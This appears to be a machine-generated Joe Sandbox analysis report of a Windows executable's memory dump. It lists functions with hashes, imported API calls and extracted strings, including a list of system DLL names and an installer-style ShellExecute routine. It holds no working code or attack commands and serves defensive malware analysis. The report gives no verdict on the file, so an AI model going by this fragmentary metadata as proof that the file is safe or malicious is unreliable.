Opcode ID: 42ae873f8167721f5f2066597c1632663bc2c9996c3b34b327fe22a5c50172c8
Instruction ID: a7194ae992b70f13ff98750d6b02126a1d360afd3cddb3603f44dea75f915a55
Opcode Fuzzy Hash: 42ae873f8167721f5f2066597c1632663bc2c9996c3b34b327fe22a5c50172c8
Instruction Fuzzy Hash: 76B110A6B08AE992DF1AFA62D6096F9A391B704FC5F848132CE0D07744DFBCE155C300

Function 00007FF741EA4928 Relevance: .1, Instructions: 136COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2172158543.00007FF741E91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF741E90000, based on PE: true

Associated: 00000003.00000002.2172142743.00007FF741E90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172195567.00007FF741ED8000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172239983.00007FF741EEB000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172239983.00007FF741EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172275936.00007FF741EFA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172275936.00007FF741EFE000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff741e90000_mh.jbxd

Similarity

API ID: Create$CriticalEventInitializeSectionSemaphore
String ID:
API String ID: 3340455307-0
Opcode ID: 70d0a199513ddd0303306b6c1f9c9cd84068436a56a79b22c40158a956f58a9a
Instruction ID: 0f631b775b644d43a8b74ba0d753b670e3304276d0c7fc1b8d605121912ae580
Opcode Fuzzy Hash: 70d0a199513ddd0303306b6c1f9c9cd84068436a56a79b22c40158a956f58a9a
Instruction Fuzzy Hash: 1E413A26B19666C6FB65FF11E95076AA242FBC47C8F884030DE0D07B95DEBCE442C314

Function 00007FF741EADFD0 Relevance: 143.9, APIs: 16, Strings: 66, Instructions: 440
libraryfileloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleW.KERNEL32(?,?,?,00000000,?), ref: 00007FF741EAE018
GetProcAddress.KERNEL32(?,?,?,00000000,?), ref: 00007FF741EAE030
GetProcAddress.KERNEL32(?,?,?,00000000,?), ref: 00007FF741EAE05D
CreateFileW.KERNEL32 ref: 00007FF741EAE3F0
SetFilePointer.KERNEL32 ref: 00007FF741EAE40E
ReadFile.KERNEL32 ref: 00007FF741EAE436

Part of subcall function 00007FF741EADFD0: GetSystemDirectoryW.KERNEL32 ref: 00007FF741EADDDF

CompareStringW.KERNELBASE ref: 00007FF741EAE559
CloseHandle.KERNEL32 ref: 00007FF741EAE4F3

Part of subcall function 00007FF741E91FA0: _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF741E91FFB

Part of subcall function 00007FF741EA51A4: GetVersionExW.KERNEL32 ref: 00007FF741EA51D5

Part of subcall function 00007FF741EADFD0: LoadLibraryExW.KERNELBASE ref: 00007FF741EADEFF
Part of subcall function 00007FF741EADFD0: _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF741EADFB5
Part of subcall function 00007FF741EADFD0: _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF741EADFBB
Part of subcall function 00007FF741EADFD0: _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF741EADFC1
Part of subcall function 00007FF741EADFD0: _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF741EADFC7

AllocConsole.KERNEL32(?,?,?,00000000,?), ref: 00007FF741EAE74B
GetCurrentProcessId.KERNEL32(?,?,?,00000000,?), ref: 00007FF741EAE755
AttachConsole.KERNEL32(?,?,?,00000000,?), ref: 00007FF741EAE75D
GetStdHandle.KERNEL32(?,?,?,00000000,?), ref: 00007FF741EAE780
WriteConsoleW.KERNEL32(?,?,?,00000000,?), ref: 00007FF741EAE799
Sleep.KERNEL32(?,?,?,00000000,?), ref: 00007FF741EAE7A4
FreeConsole.KERNEL32(?,?,?,00000000,?), ref: 00007FF741EAE7AA
ExitProcess.KERNEL32 ref: 00007FF741EAE7BB

Strings

WINNSI.DLL, xrefs: 00007FF741EAE275
cryptsp.dll, xrefs: 00007FF741EAE355
ntshrui.dll, xrefs: 00007FF741EAE12B
RpcRtRemote.dll, xrefs: 00007FF741EAE363
samcli.dll, xrefs: 00007FF741EAE2C9
linkinfo.dll, xrefs: 00007FF741EAE347
SetDllDirectoryW, xrefs: 00007FF741EAE026
cabinet.dll, xrefs: 00007FF741EAE1DB
propsys.dll, xrefs: 00007FF741EAE2AD
browcli.dll, xrefs: 00007FF741EAE301
apphelp.dll, xrefs: 00007FF741EAE14F
msasn1.dll, xrefs: 00007FF741EAE195
shdocvw.dll, xrefs: 00007FF741EAE179
wkscli.dll, xrefs: 00007FF741EAE2E5
srvcli.dll, xrefs: 00007FF741EAE221
shell32.dll, xrefs: 00007FF741EAE1BF
userenv.dll, xrefs: 00007FF741EAE15D
clbcatq.dll, xrefs: 00007FF741EAE0E9
secur32.dll, xrefs: 00007FF741EAE1CD
netutils.dll, xrefs: 00007FF741EAE283
dhcpcsvc.dll, xrefs: 00007FF741EAE32B
cscapi.dll, xrefs: 00007FF741EAE22F
dwmapi.dll, xrefs: 00007FF741EAE0BD, 00007FF741EAE661
DXGIDebug.dll, xrefs: 00007FF741EAE086, 00007FF741EAE5B6
netapi32.dll, xrefs: 00007FF741EAE16B
sfc_os.dll, xrefs: 00007FF741EAE091
setupapi.dll, xrefs: 00007FF741EAE141
psapi.dll, xrefs: 00007FF741EAE115
rsaenh.dll, xrefs: 00007FF741EAE0A7
ws2help.dll, xrefs: 00007FF741EAE10A
SetDefaultDllDirectories, xrefs: 00007FF741EAE053
XmlLite.dll, xrefs: 00007FF741EAE339
lpk.dll, xrefs: 00007FF741EAE0D3
ntmarta.dll, xrefs: 00007FF741EAE1F7
iphlpapi.DLL, xrefs: 00007FF741EAE267
slc.dll, xrefs: 00007FF741EAE23D
rasadhlp.dll, xrefs: 00007FF741EAE30F
mpr.dll, xrefs: 00007FF741EAE291
cryptbase.dll, xrefs: 00007FF741EAE0C8
comres.dll, xrefs: 00007FF741EAE0F4
SSPICLI.DLL, xrefs: 00007FF741EAE09C
ieframe.dll, xrefs: 00007FF741EAE120
mlang.dll, xrefs: 00007FF741EAE2BB
crypt32.dll, xrefs: 00007FF741EAE187
peerdist.dll, xrefs: 00007FF741EAE38D
profapi.dll, xrefs: 00007FF741EAE205
devrtl.dll, xrefs: 00007FF741EAE29F
UXTheme.dll, xrefs: 00007FF741EAE0B2
dhcpcsvc6.dll, xrefs: 00007FF741EAE31D
uxtheme.dll, xrefs: 00007FF741EAE66D
atl.dll, xrefs: 00007FF741EAE136
imageres.dll, xrefs: 00007FF741EAE24B
version.dll, xrefs: 00007FF741EAE07B
aclui.dll, xrefs: 00007FF741EAE371
wintrust.dll, xrefs: 00007FF741EAE1B1
Please remove %s from %s folder. It is unsecure to run %s until it is done., xrefs: 00007FF741EAE73B
samlib.dll, xrefs: 00007FF741EAE2D7
kernel32, xrefs: 00007FF741EAE011
usp10.dll, xrefs: 00007FF741EAE0DE
WindowsCodecs.dll, xrefs: 00007FF741EAE213
dnsapi.DLL, xrefs: 00007FF741EAE259
dsrole.dll, xrefs: 00007FF741EAE37F
cryptui.dll, xrefs: 00007FF741EAE1A3
ws2_32.dll, xrefs: 00007FF741EAE0FF
oleaccrc.dll, xrefs: 00007FF741EAE1E9
dfscli.dll, xrefs: 00007FF741EAE2F3

Memory Dump Source

Source File: 00000003.00000002.2172158543.00007FF741E91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF741E90000, based on PE: true

Associated: 00000003.00000002.2172142743.00007FF741E90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172195567.00007FF741ED8000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172239983.00007FF741EEB000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172239983.00007FF741EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172275936.00007FF741EFA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172275936.00007FF741EFE000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff741e90000_mh.jbxd

Similarity

API ID: _invalid_parameter_noinfo_noreturn$Console$FileHandle$AddressProcProcess$AllocAttachCloseCompareCreateCurrentDirectoryExitFreeLibraryLoadModulePointerReadSleepStringSystemVersionWrite
String ID: DXGIDebug.dll$Please remove %s from %s folder. It is unsecure to run %s until it is done.$RpcRtRemote.dll$SSPICLI.DLL$SetDefaultDllDirectories$SetDllDirectoryW$UXTheme.dll$WINNSI.DLL$WindowsCodecs.dll$XmlLite.dll$aclui.dll$apphelp.dll$atl.dll$browcli.dll$cabinet.dll$clbcatq.dll$comres.dll$crypt32.dll$cryptbase.dll$cryptsp.dll$cryptui.dll$cscapi.dll$devrtl.dll$dfscli.dll$dhcpcsvc.dll$dhcpcsvc6.dll$dnsapi.DLL$dsrole.dll$dwmapi.dll$ieframe.dll$imageres.dll$iphlpapi.DLL$kernel32$linkinfo.dll$lpk.dll$mlang.dll$mpr.dll$msasn1.dll$netapi32.dll$netutils.dll$ntmarta.dll$ntshrui.dll$oleaccrc.dll$peerdist.dll$profapi.dll$propsys.dll$psapi.dll$rasadhlp.dll$rsaenh.dll$samcli.dll$samlib.dll$secur32.dll$setupapi.dll$sfc_os.dll$shdocvw.dll$shell32.dll$slc.dll$srvcli.dll$userenv.dll$usp10.dll$uxtheme.dll$version.dll$wintrust.dll$wkscli.dll$ws2_32.dll$ws2help.dll
API String ID: 1496594111-2013832382
Opcode ID: 19926894803355f4926a5d38047f13a95aa4f57e947c60c8a04cc60affe7caae
Instruction ID: f34a80660df58e0fca79d6dd977ebe96748ed834bf1a7c698630b740ee43116a
Opcode Fuzzy Hash: 19926894803355f4926a5d38047f13a95aa4f57e947c60c8a04cc60affe7caae
Instruction Fuzzy Hash: 46322D39A0DBA2D5EB12BF60E8402E9B3A4FF44355F840236DA5D067A5EFBCD245C360

Function 00007FF741EA98DC Relevance: 25.2, APIs: 3, Strings: 11, Instructions: 702COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF741EA8E58: Concurrency::cancel_current_task.LIBCPMT ref: 00007FF741EA8F8D

_snwprintf.LEGACY_STDIO_DEFINITIONS ref: 00007FF741EA9F75
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF741EAA42F
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF741EAA435

Part of subcall function 00007FF741EB0BBC: MultiByteToWideChar.KERNEL32(?,?,?,?,?,00007FF741EB0B44), ref: 00007FF741EB0BE9

Strings

,, xrefs: 00007FF741EA9FAA
MENU, xrefs: 00007FF741EA9DD9
$%s:, xrefs: 00007FF741EA9F50
, xrefs: 00007FF741EA9DF9
@%s:, xrefs: 00007FF741EA9F57
*messages***, xrefs: 00007FF741EA9BC6
*messages***, xrefs: 00007FF741EA9C04
DIALOG, xrefs: 00007FF741EA9DCD
STRINGS, xrefs: 00007FF741EA9DC1
RTL, xrefs: 00007FF741EA9F2E
DIRECTION, xrefs: 00007FF741EA9DE5

Memory Dump Source

Source File: 00000003.00000002.2172158543.00007FF741E91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF741E90000, based on PE: true

Associated: 00000003.00000002.2172142743.00007FF741E90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172195567.00007FF741ED8000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172239983.00007FF741EEB000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172239983.00007FF741EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172275936.00007FF741EFA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172275936.00007FF741EFE000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff741e90000_mh.jbxd

Similarity

API ID: _invalid_parameter_noinfo_noreturn$ByteCharConcurrency::cancel_current_taskMultiWide_snwprintf
String ID: $ ,$$%s:$*messages***$*messages***$@%s:$DIALOG$DIRECTION$MENU$RTL$STRINGS
API String ID: 3629253777-3268106645
Opcode ID: 96347e7981fae7733940ad93ba4258564ebec1a9a55cc8409c872ccb2165f156
Instruction ID: 6661f38335e3671faa7876eb9639ce87d5a7e9609a95bebc2fce03619580725d
Opcode Fuzzy Hash: 96347e7981fae7733940ad93ba4258564ebec1a9a55cc8409c872ccb2165f156
Instruction Fuzzy Hash: 3162BE2AA1C7A2D5EB12FB64D8442BDA3A1FB807C5FC08132DA5D47695EFBCE544C360

Function 00007FF741EC1900 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 195
libraryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00007FF741EC1558: DloadProtectSection.DELAYIMP ref: 00007FF741EC15C9

RaiseException.KERNEL32 ref: 00007FF741EC19A7
DloadReleaseSectionWriteAccess.DELAYIMP ref: 00007FF741EC1993

Part of subcall function 00007FF741EC1868: DloadProtectSection.DELAYIMP ref: 00007FF741EC18C7

LoadLibraryExA.KERNELBASE ref: 00007FF741EC1A46
GetLastError.KERNEL32 ref: 00007FF741EC1A54
DloadReleaseSectionWriteAccess.DELAYIMP ref: 00007FF741EC1A86
RaiseException.KERNEL32 ref: 00007FF741EC1A9A

Strings

H, xrefs: 00007FF741EC1974

Memory Dump Source

Source File: 00000003.00000002.2172158543.00007FF741E91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF741E90000, based on PE: true

Associated: 00000003.00000002.2172142743.00007FF741E90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172195567.00007FF741ED8000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172239983.00007FF741EEB000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172239983.00007FF741EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172275936.00007FF741EFA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172275936.00007FF741EFE000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff741e90000_mh.jbxd

Similarity

API ID: DloadSection$AccessExceptionProtectRaiseReleaseWrite$ErrorLastLibraryLoad
String ID: H
API String ID: 3432403771-2852464175
Opcode ID: cf3fc932a6b7fb7fc9ef8320b4dd67bfc8d7ec91281715f792326570f1d4a57f
Instruction ID: f53c78b31e8505598dd75311bd9f851f380e2062a94d14cf855d9d9fc975b367
Opcode Fuzzy Hash: cf3fc932a6b7fb7fc9ef8320b4dd67bfc8d7ec91281715f792326570f1d4a57f
Instruction Fuzzy Hash: FC915E3AA09B22C6EB42FF65D8406ACB3B1BB08B95B884435DE1D17754EFB9E445C720

Function 00007FF741EBF4E0 Relevance: 17.8, APIs: 6, Strings: 4, Instructions: 285
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ShellExecuteExW.SHELL32 ref: 00007FF741EBF747
ShowWindow.USER32 ref: 00007FF741EBF786
GetExitCodeProcess.KERNEL32 ref: 00007FF741EBF7BD
CloseHandle.KERNEL32 ref: 00007FF741EBF7E7
ShowWindow.USER32 ref: 00007FF741EBF83F
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF741EBF8FB

Strings

.exe, xrefs: 00007FF741EBF7F2
.inf, xrefs: 00007FF741EBF675
Install, xrefs: 00007FF741EBF684
p, xrefs: 00007FF741EBF529

Memory Dump Source

Source File: 00000003.00000002.2172158543.00007FF741E91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF741E90000, based on PE: true

Associated: 00000003.00000002.2172142743.00007FF741E90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172195567.00007FF741ED8000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172239983.00007FF741EEB000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172239983.00007FF741EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172275936.00007FF741EFA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172275936.00007FF741EFE000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff741e90000_mh.jbxd

Similarity

API ID: ShowWindow$CloseCodeExecuteExitHandleProcessShell_invalid_parameter_noinfo_noreturn
String ID: .exe$.inf$Install$p
API String ID: 1054546013-3607691742
Opcode ID: 40f5f92258db821d5e8367eba2153224afcb316e6e5fa6c437148e7c2f9bac4c
Instruction ID: 520dc9fd96b3e7fb94b5ba4ff13d6a31bece0ba8049929f072261a2df1fa83db
Opcode Fuzzy Hash: 40f5f92258db821d5e8367eba2153224afcb316e6e5fa6c437148e7c2f9bac4c
Instruction Fuzzy Hash: 6DC18D2AF1D622D5FB02FB25D940279A3B1BF85B82F844131DE4D476A5EFBDE8518320

Function 00007FF741EBF0A4 Relevance: 16.6, APIs: 11, Instructions: 102
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00007FF741EBAE1C: PeekMessageW.USER32 ref: 00007FF741EBAE32
Part of subcall function 00007FF741EBAE1C: GetMessageW.USER32 ref: 00007FF741EBAE49
Part of subcall function 00007FF741EBAE1C: IsDialogMessageW.USER32 ref: 00007FF741EBAE60
Part of subcall function 00007FF741EBAE1C: TranslateMessage.USER32 ref: 00007FF741EBAE6F
Part of subcall function 00007FF741EBAE1C: DispatchMessageW.USER32 ref: 00007FF741EBAE7A

GetDlgItem.USER32 ref: 00007FF741EBF0E3
ShowWindow.USER32 ref: 00007FF741EBF109
SendMessageW.USER32 ref: 00007FF741EBF11E
SendMessageW.USER32 ref: 00007FF741EBF136
SendMessageW.USER32 ref: 00007FF741EBF157
SendMessageW.USER32 ref: 00007FF741EBF173
SendMessageW.USER32 ref: 00007FF741EBF1B6
SendMessageW.USER32 ref: 00007FF741EBF1D4
SendMessageW.USER32 ref: 00007FF741EBF1E8
SendMessageW.USER32 ref: 00007FF741EBF212
SendMessageW.USER32 ref: 00007FF741EBF22A

Memory Dump Source

Source File: 00000003.00000002.2172158543.00007FF741E91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF741E90000, based on PE: true

Associated: 00000003.00000002.2172142743.00007FF741E90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172195567.00007FF741ED8000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172239983.00007FF741EEB000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172239983.00007FF741EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172275936.00007FF741EFA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172275936.00007FF741EFE000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff741e90000_mh.jbxd

Similarity

API ID: Message$Send$DialogDispatchItemPeekShowTranslateWindow
String ID:
API String ID: 3569833718-0
Opcode ID: c58ef51af4c11ae469b78d40ba7290d4e9656f32b0895ce54e4debee0d1a06d9
Instruction ID: 36a34e7af9bf7ca724ec00ac13fd26648a75f015b31ed43e97e03f63b74c21a4
Opcode Fuzzy Hash: c58ef51af4c11ae469b78d40ba7290d4e9656f32b0895ce54e4debee0d1a06d9
Instruction Fuzzy Hash: A241DF39F18662C6F701FF61E814BAA6360FB89B89FC40135DD0A07B95CEBDE4458764

Function 00007FF741EB87D8 Relevance: 12.7, APIs: 5, Strings: 2, Instructions: 415
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF741EB8DB6
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF741EB8DC2
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF741EB8DCE
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF741EB8DDA
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF741EB8DE0

Strings

, xrefs: 00007FF741EB8A55
, xrefs: 00007FF741EB88BE

Memory Dump Source

Source File: 00000003.00000002.2172158543.00007FF741E91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF741E90000, based on PE: true

Associated: 00000003.00000002.2172142743.00007FF741E90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172195567.00007FF741ED8000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172239983.00007FF741EEB000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172239983.00007FF741EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172275936.00007FF741EFA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172275936.00007FF741EFE000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff741e90000_mh.jbxd

Similarity

API ID: _invalid_parameter_noinfo_noreturn
String ID: $
API String ID: 3668304517-227171996
Opcode ID: 13ce0140fcad086c7967ae2b9afad083efca3074a1889f830416c9c45801d476
Instruction ID: 65859f62133deea81a28baac0e16a7417e701a2c2c9a51b088c361332ac8d20f
Opcode Fuzzy Hash: 13ce0140fcad086c7967ae2b9afad083efca3074a1889f830416c9c45801d476
Instruction Fuzzy Hash: EDF1DD6AF18666C0EF05FB64D4445BCA362BB44BA9F805231CA6D177D5EFBCE082C360

Function 00007FF741E9EF10 Relevance: 11.0, APIs: 7, Instructions: 453COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF741E9F542
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF741E9F548
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF741E9F554
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF741E9F55A
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF741E9F560
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF741E9F56C
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF741E9F572

Memory Dump Source

Source File: 00000003.00000002.2172158543.00007FF741E91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF741E90000, based on PE: true

Associated: 00000003.00000002.2172142743.00007FF741E90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172195567.00007FF741ED8000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172239983.00007FF741EEB000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172239983.00007FF741EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172275936.00007FF741EFA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172275936.00007FF741EFE000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff741e90000_mh.jbxd

Similarity

API ID: _invalid_parameter_noinfo_noreturn
String ID:
API String ID: 3668304517-0
Opcode ID: e994a9db728abc9e3b7c2f1aeddd0c1bbb8b4fdc17eb45be45aeabee48c93372
Instruction ID: df997bf58cece361c7805e341570a71e68694a155ee25f36be72c8de5f70ab3f
Opcode Fuzzy Hash: e994a9db728abc9e3b7c2f1aeddd0c1bbb8b4fdc17eb45be45aeabee48c93372
Instruction Fuzzy Hash: 2512E266F2C752C4EB11FB64D4402ADA772BB467A9F800232DA6C17ADADFBCD485C350

Function 00007FF741EA24C0 Relevance: 9.2, APIs: 6, Instructions: 164
filetimeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileW.KERNELBASE ref: 00007FF741EA259B
GetLastError.KERNEL32 ref: 00007FF741EA25AE
CreateFileW.KERNEL32 ref: 00007FF741EA260E
GetLastError.KERNEL32 ref: 00007FF741EA2617
SetFileTime.KERNEL32 ref: 00007FF741EA26C9
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF741EA2736

Memory Dump Source

Source File: 00000003.00000002.2172158543.00007FF741E91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF741E90000, based on PE: true

Associated: 00000003.00000002.2172142743.00007FF741E90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172195567.00007FF741ED8000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172239983.00007FF741EEB000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172239983.00007FF741EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172275936.00007FF741EFA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172275936.00007FF741EFE000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff741e90000_mh.jbxd

Similarity

API ID: File$CreateErrorLast$Time_invalid_parameter_noinfo_noreturn
String ID:
API String ID: 3536497005-0
Opcode ID: 7e74b88d639c8d570aa5cbccebcd9353285634c108726f52f9c563d03d833b9c
Instruction ID: 66670761b05a3ff096d156d8d24ddb09d21d8ca3d63cc42bd80284d1864fb9f8
Opcode Fuzzy Hash: 7e74b88d639c8d570aa5cbccebcd9353285634c108726f52f9c563d03d833b9c
Instruction Fuzzy Hash: 7B61026AB1C652C5EB21BB29E40036EA7B1BB847A8F501334DEAD13AD9DF7DC055C710

Function 00007FF741EBB014 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 54
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadBitmapW.USER32 ref: 00007FF741EBB02A
GetObjectW.GDI32 ref: 00007FF741EBB05B
DeleteObject.GDI32 ref: 00007FF741EBB095
DeleteObject.GDI32 ref: 00007FF741EBB0C5

Part of subcall function 00007FF741EB8624: FindResourceW.KERNEL32 ref: 00007FF741EB863D
Part of subcall function 00007FF741EB8624: SizeofResource.KERNEL32 ref: 00007FF741EB8659
Part of subcall function 00007FF741EB8624: LoadResource.KERNEL32 ref: 00007FF741EB8673
Part of subcall function 00007FF741EB8624: LockResource.KERNEL32 ref: 00007FF741EB8685
Part of subcall function 00007FF741EB8624: GlobalAlloc.KERNELBASE ref: 00007FF741EB86A6
Part of subcall function 00007FF741EB8624: GlobalLock.KERNEL32 ref: 00007FF741EB86BB
Part of subcall function 00007FF741EB8624: CreateStreamOnHGlobal.COMBASE ref: 00007FF741EB86E8
Part of subcall function 00007FF741EB8624: GdipAlloc.GDIPLUS ref: 00007FF741EB86FE
Part of subcall function 00007FF741EB8624: GdipCreateHBITMAPFromBitmap.GDIPLUS ref: 00007FF741EB8769
Part of subcall function 00007FF741EB8624: GlobalUnlock.KERNEL32 ref: 00007FF741EB878C
Part of subcall function 00007FF741EB8624: GlobalFree.KERNEL32 ref: 00007FF741EB8795

Strings

], xrefs: 00007FF741EBB063

Memory Dump Source

Source File: 00000003.00000002.2172158543.00007FF741E91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF741E90000, based on PE: true

Associated: 00000003.00000002.2172142743.00007FF741E90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172195567.00007FF741ED8000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172239983.00007FF741EEB000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172239983.00007FF741EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172275936.00007FF741EFA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172275936.00007FF741EFE000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff741e90000_mh.jbxd

Similarity

API ID: Global$Resource$Object$AllocBitmapCreateDeleteGdipLoadLock$FindFreeFromSizeofStreamUnlock
String ID: ]
API String ID: 3561356813-3352871620
Opcode ID: 2f79d63664e457f963bfbd157e1c525b341384e02eb8e860e1f42d2dee528bbf
Instruction ID: 61c3fdbea1c43e7c8bd5d7d28ed5767f28d7676605cde01b65aa7666091576b3
Opcode Fuzzy Hash: 2f79d63664e457f963bfbd157e1c525b341384e02eb8e860e1f42d2dee528bbf
Instruction Fuzzy Hash: 00119328B0D252C1FB26FB21A644679D292BF88BC2F880134DD5D07B99DEACE9058624

Function 00007FF741EBAE1C Relevance: 7.5, APIs: 5, Instructions: 27
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

PeekMessageW.USER32 ref: 00007FF741EBAE32
GetMessageW.USER32 ref: 00007FF741EBAE49
IsDialogMessageW.USER32 ref: 00007FF741EBAE60
TranslateMessage.USER32 ref: 00007FF741EBAE6F
DispatchMessageW.USER32 ref: 00007FF741EBAE7A

Memory Dump Source

Source File: 00000003.00000002.2172158543.00007FF741E91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF741E90000, based on PE: true

